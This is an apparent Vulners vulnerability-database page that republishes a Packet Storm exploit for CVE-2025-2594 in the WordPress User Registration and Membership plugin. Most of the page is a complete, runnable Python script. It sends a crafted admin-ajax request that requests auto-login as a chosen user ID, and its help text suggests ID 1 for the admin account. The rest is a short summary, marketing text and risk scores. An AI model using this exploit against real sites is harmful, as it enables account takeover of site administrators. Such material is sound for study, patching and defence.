Lucene search
+L

๐Ÿ“„ WordPress User Registration and Membership 4.1.2 Authentication Bypass

๐Ÿ—“๏ธย 26 May 2025ย 00:00:00Reported byย Mohammed Idrees BanyamerTypeย 
packetstorm
ย packetstorm
๐Ÿ”—ย packetstorm.news๐Ÿ‘ย 98ย Views

WordPress User Registration and Membership plugin allows authentication bypass in versions up to 4.1.2.

Related
Code
#!/usr/bin/env python3
    # Exploit Title: WordPress User Registration & Membership Plugin 4.1.2 - Authentication Bypass
    # Date: 2025-05-22
    # Exploit Author: Mohammed Idrees Banyamer
    # Vendor Homepage: https://wordpress.org/plugins/user-registration/
    # Software Link: https://downloads.wordpress.org/plugin/user-registration.4.1.2.zip
    # Version: <= 4.1.2
    # Tested on: WordPress 6.x, Apache on Linux
    # CVE: CVE-2025-2594
    
    import requests
    import sys
    import argparse
    from urllib.parse import urljoin
    from termcolor import cprint, colored
    
    def banner():
        cprint("โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”", "cyan")
        cprint("โ”‚ WordPress Plugin User Registration <= 4.1.2   โ”‚", "cyan")
        cprint("โ”‚ Authentication Bypass Exploit (CVE-2025-2594)โ”‚", "cyan")
        cprint("โ”‚ Author: Mohammed Idrees Banyamer             โ”‚", "cyan")
        cprint("โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜", "cyan")
    
    def exploit(target_url, member_id, nonce):
        endpoint = urljoin(target_url, "/wp-admin/admin-ajax.php")
    
        files = {
            'action': (None, 'user_registration_membership_confirm_payment'),
            'security': (None, nonce),
            'form_response': (None, '{"auto_login": true}'),
            'member_id': (None, str(member_id))
        }
    
        cprint(f"[+] Target URL: {endpoint}", "yellow")
        cprint(f"[+] Attempting to bypass authentication as user ID {member_id}...\n", "yellow")
    
        try:
            response = requests.post(endpoint, files=files, timeout=10)
    
            if response.status_code == 200 and '"success":true' in response.text:
                cprint("[โœ“] Exploit successful! Authentication bypass achieved.", "green")
                cprint("[!] Check your session/cookies - you may now be authenticated as the target user.\n", "green")
                print("Server Response:")
                print(response.text)
            else:
                cprint("[-] Exploit failed or invalid nonce/member_id.", "red")
                print("Server Response:")
                print(response.text)
        except requests.exceptions.RequestException as e:
            cprint(f"[!] Request failed: {e}", "red")
    
    def main():
        banner()
    
        parser = argparse.ArgumentParser(description="CVE-2025-2594 - WordPress Plugin Authentication Bypass")
        parser.add_argument("target", help="Base target URL (e.g., http://localhost)")
        parser.add_argument("member_id", help="Target user ID (usually 1 for admin)")
        parser.add_argument("nonce", help="_confirm_payment_nonce value from registration page")
    
        args = parser.parse_args()
    
        exploit(args.target, args.member_id, args.nonce)
    
    if __name__ == "__main__":
        main()

Data

Build on a solid foundation withย Vulners data

Weย provide theย essential building blocks forย cybersecurity solutions withย comprehensive, structured, andย constantly updated vulnerability andย exploits data

Api

Power your application withย Vulners API

The Vulners REST API offers reliable, high-performance access toย vulnerabilityย intelligence, withย 99.9%ย SLAย uptime andย CDN-backed data delivery forย seamlessย global access

App

Assess and manage vulnerabilities withย Vulnersย tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

26 May 2025 00:00Current
7.6High risk
Vulners AI Score7.6
CVSS 3.18.1
EPSS0.07427
SSVC
98